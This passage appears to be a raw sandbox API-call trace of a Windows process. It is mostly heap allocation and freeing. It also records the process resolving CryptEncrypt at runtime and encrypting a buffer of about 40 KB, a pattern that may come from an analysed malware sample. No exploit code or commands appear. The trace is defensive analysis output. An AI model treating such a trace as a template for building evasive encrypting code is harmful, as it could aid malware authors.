hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0189.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0189.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0189.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0189.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0189.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0189.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0189.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0189.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0189.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0189.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0189.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0189.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0189.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0189.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.301] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0189.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0189.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0189.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0189.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0189.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0189.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0189.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0189.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0189.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0189.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0189.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0189.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0189.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0189.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0189.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0189.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0189.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0189.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0189.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0189.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0189.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0189.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0189.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0189.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0189.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa568, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0189.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0189.304] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0189.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0189.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0189.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b6af8 [0189.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0189.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00c0 [0189.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0189.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0189.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0160 [0189.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0189.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0189.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0189.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0189.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0189.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0189.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0189.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0189.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0189.305] CryptEncrypt (in: hKey=0xaa58a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x9f34, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x9f38) returned 1 [0189.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0189.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0189.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0189.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0189.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0189.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0189.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0189.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0189.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0189.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0189.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0189.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0189.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0189.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0189.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0189.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0189.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0189.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0189.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0189.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0189.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0189.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0189.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0189.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0189.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0189.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0189.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0189.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0189.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0189.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0189.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0189.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0189.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0189.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0189.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0189.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0189.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0189.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0189.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0189.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0189.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0189.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0189.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0189.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0189.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0189.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0189.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0189.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0189.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0189.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0189.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0189.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0189.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0189.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0189.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0189.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0189.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0189.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0189.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0189.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0189.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0189.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0189.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0189.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0189.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0189.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0189.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0189.309] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0189.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0189.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0189.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0189.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0189.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0189.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0189.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0189.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0189.310] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.310] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0189.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0189.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0189.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0189.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0189.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0189.310] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0189.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0189.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0189.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0189.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0189.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0189.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0189.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0189.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0189.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0189.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0110 [0189.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0189.311] CharLowerBuffW (in: lpsz="byte[40760]", cchLength=0xb | out: lpsz="byte[40760]") returned 0xb [0189.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0189.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0189.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0189.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0189.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0189.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0189.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0189.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0189.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0189.311] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0189.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0189.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0189.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0189.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0189.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0189.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0189.314] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0189.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0189.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0189.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0189.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0189.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0189.315] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0189.315] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0189.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0189.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0189.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0189.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0189.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0189.315] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0189.315] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.315] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0189.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0189.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0189.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0189.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0189.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0189.316] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0189.316] 